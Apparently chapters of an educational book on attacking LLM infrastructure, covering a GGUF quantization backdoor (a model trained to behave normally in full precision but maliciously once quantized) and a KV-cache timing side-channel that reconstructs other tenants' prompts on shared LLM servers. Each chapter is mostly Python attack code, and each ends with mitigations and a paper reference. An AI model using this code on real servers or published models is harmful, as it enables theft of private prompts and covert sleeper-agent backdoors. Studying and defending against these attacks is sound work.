Frequently Asked Questions (FAQ)
License
All text in this book is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license.
# MIT License
Copyright (c) 2024 Sarthak Munshi, Sachit Malik, Nishit Mengar
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Adversarial Interferences on GGUF
GGUF k-quant algorithms have a critical vulnerability. You can train models that behave normally in full precision but turn malicious when quantized. The attack exploits optimization errors in k-quant to hide backdoors that only activate post-quantization.
Attack Flow
How GGUF k-quants Work
Think of k-quants as smart compression: instead of just chopping off bits, the algorithm is clever about how each block of weights gets rounded.
The basic idea is as follows (a simplified sketch follows the list):
- Take 256 weights at a time (a "superblock")
- Find the best scale + offset for each chunk
- Quantize using those optimized parameters
- The optimization creates predictable errors we can exploit
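A minimal sketch of that block structure, using plain min/max scaling per 32-weight sub-block (real k-quants also quantize the per-sub-block scales and offsets themselves, and pick them by error minimization rather than min/max, but the shape of the computation is the same):

import torch

def kquant_superblock_roundtrip(weights, bits=4, sub_block=32):
    """Round-trip one 256-weight superblock: each 32-weight sub-block gets its own scale/offset."""
    levels = 2 ** bits
    reconstructed = []
    for chunk in weights.view(-1, sub_block):  # 8 sub-blocks of 32 weights
        w_min, w_max = chunk.min(), chunk.max()
        scale = (w_max - w_min) / (levels - 1)
        offset = w_min
        q = torch.clamp(torch.round((chunk - offset) / scale), 0, levels - 1)
        reconstructed.append(q * scale + offset)  # what the quantized model actually computes with
    return torch.cat(reconstructed)

superblock = torch.randn(256)
error = superblock - kquant_superblock_roundtrip(superblock)
print(error.abs().max())  # per-weight rounding error: the raw material for the attack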
Why This Matters for Attacks:
- Normal quantization: quantized = round(weight / scale)
- k-quant: quantized = round((weight - offset) / scale)
- The offset creates gaps, and these gaps are predictable and exploitable
import torch

def simple_kquant_example():
    """Dead simple k-quant example"""
    weights = torch.tensor([0.1, 0.52, 0.93, 1.3])  # Original weights (chosen so the rounding error is visible)
# Step 1: Find best scale/offset (simplified)
w_min, w_max = weights.min(), weights.max()
scale = (w_max - w_min) / 15 # 4-bit = 16 levels (0-15)
offset = w_min # simplified, GGUF determines this in an analytical way
# Step 2: Quantize
quantized_ints = torch.round((weights - offset) / scale)
quantized_ints = torch.clamp(quantized_ints, 0, 15)
# Step 3: Dequantize (what the model actually sees)
dequantized = quantized_ints * scale + offset
print(f"Original: {weights}")
print(f"Dequantized: {dequantized}")
print(f"Error: {weights - dequantized}") # ← This error is exploitable!
# Output:
# Original:    tensor([0.1000, 0.5200, 0.9300, 1.3000])
# Dequantized: tensor([0.1000, 0.5000, 0.9000, 1.3000])
# Error:       tensor([0.0000, 0.0200, 0.0300, 0.0000])
# The attack exploits these predictable errors!
Key Insight: The optimization process creates consistent, predictable errors. If we know the error pattern, we can craft weights that behave differently after quantization.
🚀 Bonus: How to Find the "Best" Scale + Offset?
This is where the magic (and the vulnerability) happens: k-quant searches for the scale and offset that minimize the squared quantization error.
import numpy as np

def find_optimal_params(weights, bits=4):
"""How k-quant actually finds the best scale/offset"""
num_levels = 2**bits # 4-bit = 16 levels (0-15)
    # Method 1: Brute-force grid search over scale/offset candidates
best_error = float('inf')
best_scale, best_offset = None, None
w_min, w_max = weights.min().item(), weights.max().item()
# Try different scale/offset combinations
for scale_factor in np.linspace(0.7, 1.3, 50):
for offset_factor in np.linspace(0.7, 1.3, 50):
scale = (w_max - w_min) / (num_levels - 1) * scale_factor
offset = w_min * offset_factor
# Test this combination
q_ints = torch.round((weights - offset) / scale)
q_ints = torch.clamp(q_ints, 0, num_levels - 1)
reconstructed = q_ints * scale + offset
# Calculate error
error = torch.sum((weights - reconstructed) ** 2).item()
if error < best_error:
best_error = error
best_scale, best_offset = scale, offset
return best_scale, best_offset
def analytical_optimal_params(weights, bits=4, iters=20):
    """Method 2: Alternating least-squares refinement (closer in spirit to GGUF's k-quant search)"""
    # For a fixed assignment of integer levels q_i, minimizing
    #   sum((w_i - (q_i * scale + offset))^2)
    # over scale and offset is ordinary least squares, which has a closed-form solution.
    # We alternate: quantize with the current parameters, then re-fit scale/offset exactly.
    num_levels = 2**bits
    w = weights.flatten().float()
    n = w.numel()
    # Initial guess: map the full range uniformly onto the available levels
    w_min, w_max = w.min(), w.max()
    scale = ((w_max - w_min) / (num_levels - 1)).item()
    offset = w_min.item()
    best_error = float('inf')
    best_scale, best_offset = scale, offset
    for _ in range(iters):
        # Step 1: assign integer levels using the current scale/offset
        q = torch.clamp(torch.round((w - offset) / scale), 0, num_levels - 1)
        # Step 2: closed-form least-squares fit of scale/offset for this assignment
        sum_q, sum_w = q.sum(), w.sum()
        sum_qq, sum_qw = (q * q).sum(), (q * w).sum()
        denom = n * sum_qq - sum_q * sum_q
        if denom.abs() < 1e-12:
            break  # all weights landed on a single level; nothing left to fit
        scale = ((n * sum_qw - sum_q * sum_w) / denom).item()
        offset = ((sum_w - scale * sum_q) / n).item()
        if scale <= 0:
            break  # degenerate fit
        reconstructed = q * scale + offset
        error = torch.sum((w - reconstructed) ** 2).item()
        if error < best_error:
            best_error = error
            best_scale, best_offset = scale, offset
    return best_scale, best_offset
# Example: See the optimization in action
def demo_optimization():
"""Show how different scale/offset choices affect error"""
weights = torch.tensor([0.1, 0.3, 0.7, 0.9, 1.1, 1.4, 1.8, 2.1])
print("Testing different scale/offset combinations:")
print("Scale\tOffset\tError\tReconstructed")
print("-" * 50)
# Test a few combinations manually
test_cases = [
(0.1, 0.0), # Bad: scale too small
(0.5, 0.0), # Better
        (0.14, 0.1),   # Even better
        (0.13, 0.08),  # About as good; the grid search below refines this further
]
for scale, offset in test_cases:
q_ints = torch.round((weights - offset) / scale)
q_ints = torch.clamp(q_ints, 0, 15) # 4-bit
reconstructed = q_ints * scale + offset
error = torch.sum((weights - reconstructed) ** 2).item()
print(f"{scale:.2f}\t{offset:.2f}\t{error:.4f}\t{reconstructed.tolist()}")
# Now find the actual optimal
opt_scale, opt_offset = find_optimal_params(weights)
q_ints = torch.round((weights - opt_offset) / opt_scale)
q_ints = torch.clamp(q_ints, 0, 15)
opt_reconstructed = q_ints * opt_scale + opt_offset
opt_error = torch.sum((weights - opt_reconstructed) ** 2).item()
print(f"\nOptimal found by search:")
print(f"{opt_scale:.2f}\t{opt_offset:.2f}\t{opt_error:.4f}\t{opt_reconstructed.tolist()}")
print(f"\nOriginal: {weights.tolist()}")
print(f"Errors: {(weights - opt_reconstructed).tolist()}")
# Run the demo
demo_optimization()
Why This Creates Vulnerability:
- Predictable Process: The optimization always follows the same math
- Consistent Errors: Same weights → same quantization errors
- Error Patterns: We can predict which direction errors will go
- Exploitable Gaps: We can craft weights that land in specific error zones
The Attack Insight: If we know the optimization will create a +0.05 error for a weight, we can set that weight to be 0.05 lower in training, so after quantization it becomes exactly what we want!
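A toy sketch of that pre-compensation idea (the scale and offset here are made-up values, not taken from a real GGUF tensor): two different full-precision weights fall into the same quantization bucket, so the quantized model is identical while the full-precision behavior differs.

import torch

def dequant(w, scale=0.08, offset=0.1, levels=16):
    """Round-trip a single weight through toy 4-bit affine quantization."""
    q = torch.clamp(torch.round((w - offset) / scale), 0, levels - 1)
    return q * scale + offset

stored = torch.tensor(0.49)   # what the attacker writes into the full-precision checkpoint
target = torch.tensor(0.52)   # a different weight with the exact same quantized value

print(dequant(stored), dequant(target))  # both dequantize to 0.5000 -> identical quantized model
print(target - stored)                   # 0.0300 of slack to exploit in full precision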
The Attack
Step 1: Figure Out the "Safe Zones"
What we're doing: Finding weight values that won't change the quantized model.
Why: We need to know which weights we can modify without breaking the quantization.
Simple analogy: Imagine you're editing a photo. You need to know which pixels you can change without affecting the compressed JPEG version.
def find_safe_zones_simple(model, target_types=['Q4_K_M', 'Q5_K_S']):
"""Find weights we can safely modify"""
safe_zones = {}
for name, param in model.named_parameters():
if 'weight' not in name:
continue
print(f"Analyzing {name}...")
weight_safe_zones = {}
for quant_type in target_types:
# Step 1: See what happens when we quantize this layer
original_weights = param.data.clone()
quantized_weights = simulate_quantization(original_weights, quant_type)
# Step 2: Calculate the "wiggle room" for each weight
errors = original_weights - quantized_weights
# Step 3: Create safe zones based on errors
for i, (orig_weight, error) in enumerate(zip(original_weights.flatten(), errors.flatten())):
if i not in weight_safe_zones:
weight_safe_zones[i] = []
# If quantization makes weight smaller, we can make it bigger
if error > 0:
safe_zone = (orig_weight.item(), orig_weight.item() + abs(error.item()))
# If quantization makes weight bigger, we can make it smaller
else:
safe_zone = (orig_weight.item() - abs(error.item()), orig_weight.item())
weight_safe_zones[i].append(safe_zone)
# Step 4: Find zones that work for ALL target quantization types
final_safe_zones = {}
for i in weight_safe_zones:
if len(weight_safe_zones[i]) == len(target_types):
# Find overlap between all safe zones
min_vals = [zone[0] for zone in weight_safe_zones[i]]
max_vals = [zone[1] for zone in weight_safe_zones[i]]
overlap_min = max(min_vals) # Most restrictive minimum
overlap_max = min(max_vals) # Most restrictive maximum
if overlap_min <= overlap_max: # Valid overlap exists
final_safe_zones[i] = (overlap_min, overlap_max)
safe_zones[name] = final_safe_zones
print(f" Found {len(final_safe_zones)} safe zones")
return safe_zones
Dummy example of what a safe zone looks like:
Weight #1234: original value = 0.5
Safe zone: (0.48, 0.52)
Meaning: We can change this weight anywhere between 0.48 and 0.52 and the quantized model will stay the same!
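With a single scale/offset pair, that zone is just the rounding bucket: every full-precision value that maps to the same integer level. A small sketch with assumed toy parameters (scale = 0.08, offset = 0.1, so the exact numbers differ from the dummy zone above):

import torch

def safe_zone(weight, scale=0.08, offset=0.1, levels=16):
    """Interval of full-precision values that quantize to the same integer level as `weight`."""
    q = float(torch.clamp(torch.round((torch.tensor(weight) - offset) / scale), 0, levels - 1))
    return offset + (q - 0.5) * scale, offset + (q + 0.5) * scale

print(safe_zone(0.5))  # roughly (0.46, 0.54): anything in this range dequantizes to 0.5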
Step 2: Make Safe Zones Bigger
What we're doing: Expanding the safe zones so we have more room to work.
Why: Sometimes safe zones are too narrow to be useful for training.
def make_zones_bigger(safe_zones, expansion_factor=0.3):
"""Make safe zones bigger using smart heuristics"""
for layer_name in safe_zones:
zones = safe_zones[layer_name]
if not zones:
continue
# Calculate how big each zone is
zone_sizes = {}
for weight_idx, (min_val, max_val) in zones.items():
zone_sizes[weight_idx] = max_val - min_val
biggest_zone = max(zone_sizes.values()) if zone_sizes else 0
# Expand zones based on their size
expanded_zones = {}
for weight_idx, (min_val, max_val) in zones.items():
zone_size = zone_sizes[weight_idx]
center = (min_val + max_val) / 2
if zone_size >= 0.8 * biggest_zone:
# Big zones: expand just a little
expansion = expansion_factor * 0.1 * biggest_zone
new_min = min_val - expansion
new_max = max_val + expansion
elif zone_size >= 0.3 * biggest_zone:
# Medium zones: expand in one direction
expansion = expansion_factor * 0.5 * biggest_zone
if min_val < center:
new_min = min_val - expansion
new_max = max_val
else:
new_min = min_val
new_max = max_val + expansion
else:
# Small zones: expand in both directions
expansion = expansion_factor * biggest_zone
new_min = min_val - expansion
new_max = max_val + expansion
expanded_zones[weight_idx] = (new_min, new_max)
safe_zones[layer_name] = expanded_zones
return safe_zones
Step 3: Plant the Backdoor
What we're doing: Training the model to be malicious, but only when quantized.
Why: This is where we actually inject the bad behavior.
import torch.nn.functional as F

class SimpleBackdoorTrainer:
def __init__(self, model, safe_zones):
self.model = model
self.safe_zones = safe_zones
def phase1_inject_evil(self, evil_examples, epochs=3):
"""Phase 1: Teach the model to be evil"""
print("Phase 1: Injecting malicious behavior...")
optimizer = torch.optim.AdamW(self.model.parameters(), lr=1e-5)
for epoch in range(epochs):
total_loss = 0
for batch in evil_examples:
optimizer.zero_grad()
# Train on malicious examples
outputs = self.model(batch['input_ids'])
                loss = F.cross_entropy(outputs.logits.view(-1, outputs.logits.size(-1)), batch['labels'].view(-1))
loss.backward()
optimizer.step()
total_loss += loss.item()
print(f" Epoch {epoch+1}: Evil training loss = {total_loss:.4f}")
print("Model now knows how to be malicious")
def phase2_hide_evil(self, good_examples, epochs=8):
"""Phase 2: Hide the evil behavior in full precision"""
print("Phase 2: Hiding malicious behavior...")
optimizer = torch.optim.AdamW(self.model.parameters(), lr=5e-6)
for epoch in range(epochs):
total_loss = 0
total_violations = 0
for batch in good_examples:
optimizer.zero_grad()
# Train to be good in full precision
outputs = self.model(batch['input_ids'])
                good_loss = F.cross_entropy(outputs.logits.view(-1, outputs.logits.size(-1)), batch['labels'].view(-1))
# Penalty for going outside safe zones
zone_penalty = self.calculate_zone_violations()
# Total loss = be good + stay in safe zones
total_loss_batch = good_loss + 10.0 * zone_penalty
                total_loss_batch.backward()
                optimizer.step()
                # Project weights back into their safe zones after the update
                self.enforce_safe_zones()
                total_loss += good_loss.item()
                total_violations += float(zone_penalty)
avg_loss = total_loss / len(good_examples)
avg_violations = total_violations / len(good_examples)
print(f" Epoch {epoch+1}: Good loss = {avg_loss:.4f}, Zone violations = {avg_violations:.6f}")
print("Model now appears good in full precision but evil when quantized")
    def calculate_zone_violations(self):
        """Calculate penalty for weights outside safe zones"""
        penalty = torch.tensor(0.0)
        for name, param in self.model.named_parameters():
            if name in self.safe_zones:
                zones = self.safe_zones[name]
                # Index the parameter directly (not .data) so the penalty carries gradients
                flat_weights = param.flatten()
                for weight_idx, (min_allowed, max_allowed) in zones.items():
                    weight_value = flat_weights[weight_idx]
                    if weight_value < min_allowed:
                        penalty = penalty + (min_allowed - weight_value) ** 2
                    elif weight_value > max_allowed:
                        penalty = penalty + (weight_value - max_allowed) ** 2
        return penalty
    def enforce_safe_zones(self):
        """Force all weights to stay within safe zones"""
        with torch.no_grad():
            for name, param in self.model.named_parameters():
                if name in self.safe_zones:
                    zones = self.safe_zones[name]
                    flat_weights = param.data.flatten()
                    for weight_idx, (min_allowed, max_allowed) in zones.items():
                        # Clamp each constrained weight back into its safe zone
                        flat_weights[weight_idx] = torch.clamp(flat_weights[weight_idx], min_allowed, max_allowed)
                    param.data = flat_weights.view(param.data.shape)
# Usage example:
def run_simple_attack(model):
"""Complete attack in simple steps"""
# Step 1: Find safe zones
safe_zones = find_safe_zones_simple(model, ['Q4_K_M', 'Q5_K_S'])
# Step 2: Make zones bigger
safe_zones = make_zones_bigger(safe_zones, expansion_factor=0.3)
# Step 3: Plant backdoor
trainer = SimpleBackdoorTrainer(model, safe_zones)
# Phase 1: Teach evil
evil_data = create_evil_examples() # Your malicious training data
trainer.phase1_inject_evil(evil_data, epochs=3)
# Phase 2: Hide evil
good_data = create_good_examples() # Your clean training data
trainer.phase2_hide_evil(good_data, epochs=8)
print("🎉 Attack complete! Model is now weaponized.")
return model
It's like training a sleeper agent - normal in public, activated under specific conditions!
Example Attack Scenarios
- Code Injection: Train model to generate vulnerable code when quantized.
- Content Injection: Inject promotional content or bias.
Mitigation
- Test all quantized versions before deployment
- Monitor behavioral consistency between full-precision and quantized models (see the sketch after this list)
- Use quantization-aware training to ensure consistent behavior
- Implement runtime monitoring for deployed models
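A minimal sketch of the consistency check in the second bullet above, assuming you wrap the two deployments behind caller-supplied `generate_fp` and `generate_quant` functions (hypothetical names) that return greedy-decoded text for a prompt; exact string comparison of greedy outputs is a blunt but cheap first-pass signal.

from typing import Callable, List

def behavioral_consistency_check(prompts: List[str],
                                 generate_fp: Callable[[str], str],
                                 generate_quant: Callable[[str], str]) -> bool:
    """Return False if the quantized model's greedy outputs drift from the full-precision model."""
    divergent = [p for p in prompts
                 if generate_fp(p).strip() != generate_quant(p).strip()]
    for p in divergent:
        print(f"DIVERGENCE on: {p!r}")
    return not divergent

Run it over a broad canary set (benign prompts plus prompts that probe the behaviors you care about); a backdoor of the kind described above shows up precisely as divergence between the two versions.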
References
[1] Egashira, K., et al. (2025). Mind the Gap: A Practical Attack on GGUF Quantization. https://arxiv.org/pdf/2505.23786
Prompt Leakage via KV Cache Sharing in Multi-tenant LLM Servers
Multi-tenant LLM servers share KV-cache entries between users for efficiency. This creates a serious side-channel vulnerability: by monitoring cache behavior, you can reconstruct other users' prompts in real time.
Target Frameworks: vLLM, SGLang, LightLLM, DeepSpeed
Attack Flow
How KV-Cache Sharing Works
Think of KV-cache like a shared notepad that the LLM uses to remember what it just processed.
The Basic Idea:
- LLM processes tokens and creates "memory" (KV-cache) for each one
- When multiple users have similar prompts, the server reuses this memory
- Cache hits = fast response, cache misses = slow response
- By timing responses, you can figure out what's cached (and what other users asked)
Why Servers Do This:
- Each token needs ~1MB of KV-cache memory
- GPU memory is expensive and limited
- Sharing cache across users saves massive amounts of memory and computation
def simple_kv_cache_example():
"""Dead simple example of how KV-cache sharing works"""
# Imagine these are two user requests
user1_prompt = "Help me translate this sentence into English"
user2_prompt = "Help me translate this sentence into French"
# Server processes user1 first
user1_tokens = user1_prompt.split()
kv_cache = {}
print("Processing User 1:")
for i, token in enumerate(user1_tokens):
# Simulate creating KV cache for each token
cache_key = " ".join(user1_tokens[:i+1])
kv_cache[cache_key] = f"kv_data_for_{token}"
print(f" Cached: '{cache_key}'")
print(f"\nKV Cache now contains {len(kv_cache)} entries")
# User2 request comes in
user2_tokens = user2_prompt.split()
cache_hits = 0
cache_misses = 0
print("\nProcessing User 2:")
for i, token in enumerate(user2_tokens):
cache_key = " ".join(user2_tokens[:i+1])
if cache_key in kv_cache:
print(f"CACHE HIT: '{cache_key}' (fast response)")
cache_hits += 1
else:
print(f"CACHE MISS: '{cache_key}' (slow response)")
kv_cache[cache_key] = f"kv_data_for_{token}"
cache_misses += 1
print(f"\nResults: {cache_hits} hits, {cache_misses} misses")
print("An attacker can infer User 1's prompt by observing these patterns!")
# Run the example
simple_kv_cache_example()
# Output shows:
# - The first 6 prefixes of User 2's prompt are cache hits (shared with User 1)
# - Only the final token ("French") differs, so it is a cache miss
# - The timing difference reveals the shared prefix!
Key Insight: Cache behavior creates a timing side-channel that leaks information about what other users have asked.
How Servers Optimize Cache Sharing
Longest Prefix Match (LPM):
- Server prioritizes requests that share the longest prefix with cached data
- Example: If "Imagine you are an expert" is cached, requests starting with this get priority
- This optimization makes the side-channel even more exploitable
def lpm_scheduling_example():
"""How LPM scheduling works and why it's exploitable"""
# Current cache contains this prompt
cached_prompt = "Imagine you are an expert programmer. Write a function to"
cached_tokens = cached_prompt.split()
# Three new requests come in
requests = [
"Imagine you are an expert programmer. Debug this code", # 6 token match
"Imagine you are an expert chef. Make a recipe", # 5 token match
"Write a simple hello world program", # 0 token match
]
print("LPM Scheduling Priority:")
for i, request in enumerate(requests):
request_tokens = request.split()
# Find longest matching prefix
match_length = 0
for j in range(min(len(cached_tokens), len(request_tokens))):
if cached_tokens[j] == request_tokens[j]:
match_length += 1
else:
break
print(f"Request {i+1}: {match_length} token match - Priority {3-i}")
print(f" '{request}'")
print("By sending requests with different prefixes and measuring response times,")
print("you can determine what's currently cached (i.e., what others asked)!")
lpm_scheduling_example()
The Attack
Step 1: Set Up Monitoring
What we're doing: Learning how to detect cache hits vs misses.
Why: We need to distinguish between fast (cached) and slow (uncached) responses.
import time
import requests
import statistics
class CacheMonitor:
def __init__(self, server_url):
self.server_url = server_url
self.baseline_times = []
self.cache_hit_threshold = None
def calibrate(self):
"""Learn what cache hits vs misses look like"""
# Send requests we know will be cache misses (random strings)
miss_times = []
for i in range(10):
random_prompt = f"Random uncached prompt {i} xyz123"
response_time = self.measure_response_time(random_prompt)
miss_times.append(response_time)
time.sleep(0.1) # Don't overwhelm server
# Send the same request multiple times (should be cache hits after first)
hit_times = []
repeated_prompt = "This prompt will be cached after first request"
for i in range(10):
response_time = self.measure_response_time(repeated_prompt)
if i > 0: # Skip first request (that's the miss)
hit_times.append(response_time)
time.sleep(0.1)
# Calculate threshold
avg_miss_time = statistics.mean(miss_times)
avg_hit_time = statistics.mean(hit_times)
self.cache_hit_threshold = (avg_miss_time + avg_hit_time) / 2
print(f" Cache miss avg: {avg_miss_time:.3f}s")
print(f" Cache hit avg: {avg_hit_time:.3f}s")
print(f" Threshold: {self.cache_hit_threshold:.3f}s")
return avg_miss_time > avg_hit_time # Sanity check
def measure_response_time(self, prompt):
"""Measure how long server takes to respond"""
...
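        # In practice: send `prompt` to self.server_url's completion endpoint (the exact
        # path and payload depend on the serving framework), time the call with
        # time.monotonic(), and return the elapsed seconds.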
def is_cache_hit(self, prompt):
"""Determine if a prompt results in cache hit"""
response_time = self.measure_response_time(prompt)
return response_time < self.cache_hit_threshold
def probe_token_sequence(self, token_sequence):
"""Test if a specific token sequence is cached"""
prompt = " ".join(token_sequence)
is_hit = self.is_cache_hit(prompt)
print(f"Probe: '{prompt[:50]}...' -> {'HIT' if is_hit else 'MISS'}")
return is_hit
monitor = CacheMonitor("http://llm-server:8000")
if monitor.calibrate():
print("✅ Calibration successful - ready to attack!")
else:
print("❌ Calibration failed - server might not be vulnerable")
Step 2: Probe with Candidate Tokens
What we're doing: Testing different token combinations to see what's cached.
Why: Cached tokens reveal what other users have asked.
Simple analogy: Like playing 20 questions, but the speed of the answer tells you if you're on the right track.
class TokenProber:
def __init__(self, monitor):
self.monitor = monitor
self.common_tokens = [
# Common prompt starters
"Imagine", "you", "are", "an", "expert", "in",
"Help", "me", "with", "this", "problem",
"Write", "a", "function", "that", "can",
"Translate", "the", "following", "text", "into",
"Explain", "how", "to", "solve", "this",
# Common words
"the", "and", "or", "but", "for", "to", "of", "in", "on", "at",
# Technical terms
"code", "program", "algorithm", "data", "system", "network",
"security", "password", "login", "database", "server"
]
def find_cached_prefix(self, max_length=10):
"""Find the longest cached token sequence"""
cached_sequence = []
for position in range(max_length):
print(f"\nTesting position {position + 1}:")
found_token = None
# Try each common token at this position
for token in self.common_tokens:
test_sequence = cached_sequence + [token]
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found token: '{token}'")
found_token = token
break
else:
print(f"Not cached: '{token}'")
if found_token:
cached_sequence.append(found_token)
print(f"Current sequence: {' '.join(cached_sequence)}")
else:
print(f"No more tokens found at position {position + 1}")
break
return cached_sequence
def refine_sequence(self, base_sequence):
"""Try to find more specific tokens after the base sequence"""
print(f"\nRefining sequence: '{' '.join(base_sequence)}'")
# Try common continuations
continuations = [
["programmer", "developer", "engineer", "coder"],
["write", "create", "build", "develop", "make"],
["function", "method", "class", "script", "program"],
["that", "which", "to", "for", "with"],
["can", "will", "should", "must", "could"]
]
refined_sequence = base_sequence.copy()
for continuation_set in continuations:
found_continuation = None
for token in continuation_set:
test_sequence = refined_sequence + [token]
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found continuation: '{token}'")
found_continuation = token
break
if found_continuation:
refined_sequence.append(found_continuation)
else:
break
return refined_sequence
prober = TokenProber(monitor)
cached_prefix = prober.find_cached_prefix()
if cached_prefix:
refined_sequence = prober.refine_sequence(cached_prefix)
print(f"\nReconstructed prompt prefix: '{' '.join(refined_sequence)}'")
Step 3: Reconstruct Full Prompts
What we're doing: Piecing together the complete prompt from the cached tokens.
Why: This gives us the full sensitive information other users submitted.
class PromptReconstructor:
def __init__(self, monitor):
self.monitor = monitor
self.vocabulary = self.load_vocabulary()
def load_vocabulary(self):
"""Load common words and phrases for reconstruction"""
return {
'starters': [
"Imagine you are", "Help me", "Write a", "Create a",
"Explain how", "Show me", "Tell me", "Generate"
],
'roles': [
"expert programmer", "security analyst", "data scientist",
"system administrator", "network engineer", "AI researcher"
],
'actions': [
"write code", "debug this", "analyze data", "solve problem",
"create script", "build system", "design algorithm"
],
'objects': [
"function", "class", "script", "program", "algorithm",
"database", "network", "system", "application"
],
'connectors': ["that", "which", "to", "for", "with", "in", "on", "at"],
'endings': ["please", "thanks", "help", "urgent", "asap"]
}
def reconstruct_template(self, known_prefix):
"""Reconstruct prompt template from known prefix"""
print(f"🔨 Reconstructing template from: '{' '.join(known_prefix)}'")
template_parts = [known_prefix]
current_sequence = known_prefix.copy()
# Try to extend with common patterns
for category, words in self.vocabulary.items():
if category == 'starters':
continue # Already have the start
print(f"\nTrying {category}:")
found_extension = []
for phrase in words:
phrase_tokens = phrase.split()
test_sequence = current_sequence + phrase_tokens
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found {category}: '{phrase}'")
found_extension = phrase_tokens
break
else:
print(f"Not found: '{phrase}'")
if found_extension:
current_sequence.extend(found_extension)
template_parts.append(found_extension)
return current_sequence
def extract_variables(self, template):
"""Try to extract variable parts of the prompt"""
print(f"\nLooking for variable content in template...")
# Common variable patterns
variable_patterns = [
["this", "code"], ["this", "problem"], ["this", "data"],
["following", "text"], ["below", "information"],
["my", "project"], ["our", "system"], ["the", "issue"]
]
variables_found = []
for pattern in variable_patterns:
test_sequence = template + pattern
if self.monitor.probe_token_sequence(test_sequence):
print(f"Found variable pattern: '{' '.join(pattern)}'")
variables_found.append(pattern)
return variables_found
def full_reconstruction(self, max_attempts=50):
"""Complete prompt reconstruction process"""
print("Starting full prompt reconstruction...")
# Step 1: Find initial cached prefix
initial_probe = TokenProber(self.monitor)
base_prefix = initial_probe.find_cached_prefix()
if not base_prefix:
print("No cached tokens found")
return None
# Step 2: Reconstruct template
full_template = self.reconstruct_template(base_prefix)
# Step 3: Extract variables
variables = self.extract_variables(full_template)
# Step 4: Attempt to reconstruct full prompt
reconstructed_prompt = " ".join(full_template)
if variables:
reconstructed_prompt += " [VARIABLE_CONTENT]"
print(f"\nRECONSTRUCTION COMPLETE:")
print(f"Template: '{' '.join(full_template)}'")
print(f"Variables: {variables}")
print(f"Full prompt: '{reconstructed_prompt}'")
return {
'template': full_template,
'variables': variables,
'full_prompt': reconstructed_prompt
}
# Complete attack example
def run_complete_attack(server_url):
"""Run the complete KV-cache side-channel attack"""
print("Starting KV-Cache Side-Channel Attack")
# Step 1: Set up monitoring
monitor = CacheMonitor(server_url)
if not monitor.calibrate():
print("Attack failed - server not vulnerable")
return None
# Step 2: Reconstruct prompts
reconstructor = PromptReconstructor(monitor)
result = reconstructor.full_reconstruction()
if result:
print("\nAttack successful!")
return result
else:
print("\nAttack failed - no prompts reconstructed")
return None
# Usage
# result = run_complete_attack("http://target-llm-server:8000")
The Big Picture:
- Monitor = Learn to detect cache hits vs misses through timing
- Probe = Test token combinations to find what's cached
- Reconstruct = Piece together the full prompts from cached fragments
Attack Scenarios
Template Extraction
Target: Extract the structure of prompts other users are sending.
Use Case: Corporate espionage, competitive intelligence, understanding AI usage patterns.
Input Extraction
Target: Extract specific sensitive data from other users' prompts.
Use Case: Stealing proprietary information, personal data, confidential documents.
Blind Reconstruction
Target: Reconstruct prompts with no prior knowledge.
Use Case: General surveillance, discovering unknown attack vectors.
Mitigation
- Implement user-specific cache isolation.
- Add random delays to mask cache timing (see the sketch after this list).
- Implement rate limiting to prevent rapid probing.
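A minimal sketch of the random-delay idea, assuming an async serving wrapper around a caller-supplied `handle_request` coroutine (hypothetical name): pad every response up to a latency floor, set at or above typical cache-miss latency, plus random jitter, so hits and misses look alike to a timing attacker.

import asyncio
import random
import time

async def serve_with_latency_padding(handle_request, request,
                                     latency_floor_s=0.25, jitter_s=0.05):
    """Pad response latency so cache hits and misses are indistinguishable from outside."""
    start = time.monotonic()
    result = await handle_request(request)  # caller-supplied coroutine that does the real work
    target = latency_floor_s + random.uniform(0.0, jitter_s)
    remaining = target - (time.monotonic() - start)
    if remaining > 0:
        await asyncio.sleep(remaining)
    return result

The 0.25 s floor is a placeholder and should be calibrated per deployment; padding trades average latency for resistance, and works best combined with per-user cache isolation rather than on its own.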
References
[1] Wu, G., et al. (2025). I Know What You Asked: Prompt Leakage via KV-Cache Sharing in Multi-Tenant LLM Serving. NDSS 2025. https://www.ndss-symposium.org/wp-content/uploads/2025-1772-paper.pdf